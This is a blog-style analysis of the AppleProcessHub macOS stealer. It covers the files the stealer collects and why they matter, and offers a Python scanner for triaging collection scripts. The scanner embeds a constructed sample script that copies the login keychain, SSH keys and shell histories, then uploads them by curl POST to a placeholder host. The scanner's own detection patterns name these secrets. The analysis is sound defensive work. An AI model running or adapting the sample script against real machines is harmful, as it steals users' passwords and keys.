AppleProcessHub stealer

Researchers at Kandji dug into a new macOS stealer that uses appleprocesshub[.]com as its command and control (C&C) domain. The sample was first noticed by MalwareHunterTeam on Twitter (no, I will not call it X, nor will I link to anything there). The findings are both interesting and vague.

How does it infect the machine?

The malware appears to have been found on VirusTotal, from what I can tell, which means there’s a lot of missing context. Further, it appears that there’s a lot of analysis that was only posted on Twitter, and we’ve established my thoughts on that.

The “first stage” (in quotes because it’s unclear if this is actually the first stage) is a dynamic library (.dylib) that also happens to contain code that can be run directly as a standalone binary. How exactly this would have gotten onto a machine and been executed appears to be unknown, which is always deeply dissatisfying to me. It’s also unknown whether (and, if so, how) this malware maintains persistence. As always, anyone with more insight is welcome to reply in the comments.

However, once it’s running, one of the things it does is download and execute a shell script from the aforementioned C&C domain. That shell script is available on VirusTotal and is in clear text, so it’s easy to analyze. Or, I should say, would be, if VT would allow me to download it, but they don’t allow that for anything but binary files for free accounts. I can cheat a bit, though, and look at the content of the file, which gives good insight into what the script is doing.

What does the script do?

As pointed out by Kandji, it collects things like:

  • ~/Library/Keychains/Login.keychain-db
  • ~/.bash_history
  • ~/.zsh_history
  • ~/.gitconfig
  • ~/.ssh/
  • /etc/hosts
  • A lot of system information, including serial number, username, and a list of installed applications

The implications of this may not be immediately obvious to many, but the keychain is a particularly juicy target. It holds many passwords and cryptographic certificates, but those secrets are encrypted with the user’s login password, so a stolen keychain-db file is only useful once the attacker also obtains that password, which in practice means phishing it from the user (a fake system password prompt is the usual trick in macOS stealers). There are numerous ways this could be done, but I don’t see any mention of this in any of the analysis, so I don’t know how the attackers are doing it.

The .ssh folder is also particularly juicy, as it contains private keys that authenticate to remote hosts, and the config and known_hosts files alongside them tell the attacker which hosts those keys are for; a key without a passphrase is usable immediately. Similarly, the bash and zsh history files (every command typed, including any passwords or tokens passed on a command line) and the .gitconfig file (which can name credential helpers or embed tokens in remote URLs) can contain sensitive information, depending on your usage.
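Because the collection script is clear text, the quickest triage is simply to ask it which of the artifacts listed above it touches and where it sends them. The following is an added example written for this post, not Kandji’s tooling and not the malware’s own script: a small scanner that reports sensitive paths read, host-fingerprinting commands run, and URLs contacted, distinguishing uploads from downloads. The embedded sample script is constructed to mimic the described behaviour (the real script is not reproduced here), and the domain c2.example.invalid is a placeholder.

```python
"""Triage a clear-text collection script: which local secrets does it touch,
what host recon does it run, and where does it send the results?"""
import re

# Artifacts the write-up says the script collects. Keys are lower-case because
# the default macOS filesystem is case-insensitive (Login.keychain-db and
# login.keychain-db are the same file).
SENSITIVE_ARTIFACTS = {
    "~/library/keychains/login.keychain-db": "login keychain (encrypted with the login password)",
    "~/.bash_history": "bash history",
    "~/.zsh_history": "zsh history",
    "~/.gitconfig": "git config (may name credential helpers or embed tokens)",
    "~/.ssh": "SSH private keys, config and known_hosts",
    "/etc/hosts": "hosts file",
}

# Commands whose output is classic macOS host fingerprinting.
RECON_COMMANDS = {
    "system_profiler": "hardware/software inventory incl. serial number",
    "ioreg": "IOKit registry (serial number, hardware UUID)",
    "sw_vers": "macOS version",
    "whoami": "current username",
    "ls /Applications": "installed applications",
}

PATH_RE = re.compile(r"(?:\$\{HOME\}|\$HOME|~|/)[^\s'\";|&)]*")
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s'\"]*)?")
# curl options that send a body or a file: the script is uploading, not fetching.
UPLOAD_RE = re.compile(r"\s(?:-F|-d|-T|--data(?:-binary|-raw)?|--upload-file|-X\s+POST)\s")


def normalize_path(path):
    """Fold $HOME, ${HOME} and /Users/<name> to ~, strip trailing slashes, lower-case."""
    path = re.sub(r"^(?:\$\{HOME\}|\$HOME|/Users/[^/]+)", "~", path)
    return path.rstrip("/").lower()


def match_artifact(path):
    """Return the artifact key if path is it or lies beneath it (e.g. ~/.ssh/id_ed25519)."""
    norm = normalize_path(path)
    for artifact in SENSITIVE_ARTIFACTS:
        if norm == artifact or norm.startswith(artifact + "/"):
            return artifact
    return None


def triage_script(text):
    """Scan shell script text; return artifacts read, recon run and endpoints contacted."""
    artifacts, recon, endpoints = [], [], []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):  # skips the shebang and comments
            continue
        for token in PATH_RE.findall(line):
            hit = match_artifact(token)
            if hit and hit not in artifacts:
                artifacts.append(hit)
        for cmd in RECON_COMMANDS:
            if cmd in line and cmd not in recon:
                recon.append(cmd)
        for url in URL_RE.findall(line):
            kind = "upload" if "curl" in line and UPLOAD_RE.search(line) else "fetch"
            if (url, kind) not in endpoints:
                endpoints.append((url, kind))
    return {"artifacts": artifacts, "recon": recon, "endpoints": endpoints}


# Constructed sample, NOT the real appleprocesshub script: it only mimics the
# collect-and-upload behaviour described in the write-up.
SAMPLE_SCRIPT = r"""#!/bin/bash
# constructed sample for illustration
OUT=/tmp/.$(whoami)
mkdir -p "$OUT"
cp "$HOME/Library/Keychains/login.keychain-db" "$OUT/"
cp ~/.bash_history ~/.zsh_history ~/.gitconfig "$OUT/" 2>/dev/null
cp -R ~/.ssh "$OUT/ssh"
cp /etc/hosts "$OUT/"
system_profiler SPHardwareDataType > "$OUT/hw.txt"
ls /Applications > "$OUT/apps.txt"
tar czf /tmp/.out.tgz -C "$OUT" .
curl -s -X POST -F "file=@/tmp/.out.tgz" https://c2.example.invalid/upload
rm -rf "$OUT" /tmp/.out.tgz
"""

if __name__ == "__main__":
    report = triage_script(SAMPLE_SCRIPT)
    for key in report["artifacts"]:
        print(f"reads   {key:45} {SENSITIVE_ARTIFACTS[key]}")
    for cmd in report["recon"]:
        print(f"recon   {cmd:45} {RECON_COMMANDS[cmd]}")
    for url, kind in report["endpoints"]:
        print(f"{kind:7} {url}")
```

Point it at any collection script you can pull from VirusTotal or off a host; the matcher folds `$HOME`, `${HOME}` and `/Users/<name>` into `~` so the same rules fire whether the script hard-codes a user directory or expands it at run time, and an upload hit on a domain you do not recognise is the cue to block that domain and start credential rotation.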

Conclusions

The fact that this malware is hiding inside a .dylib is unusual and interesting. This is not something I’ve seen in malware since the first release of Mac OS X decades ago.

That said, the amount that is unknown means it’s hard to know how to respond. Kandji provided hashes of the files they know about, but just removing those files from an infected Mac may not be sufficient, and since the collected data includes the keychain and SSH keys, any passwords and keys that lived on that Mac should be treated as compromised and rotated. I’ll update if more is learned, but unfortunately, it is often the case with malware like this that no further information is ever discovered.
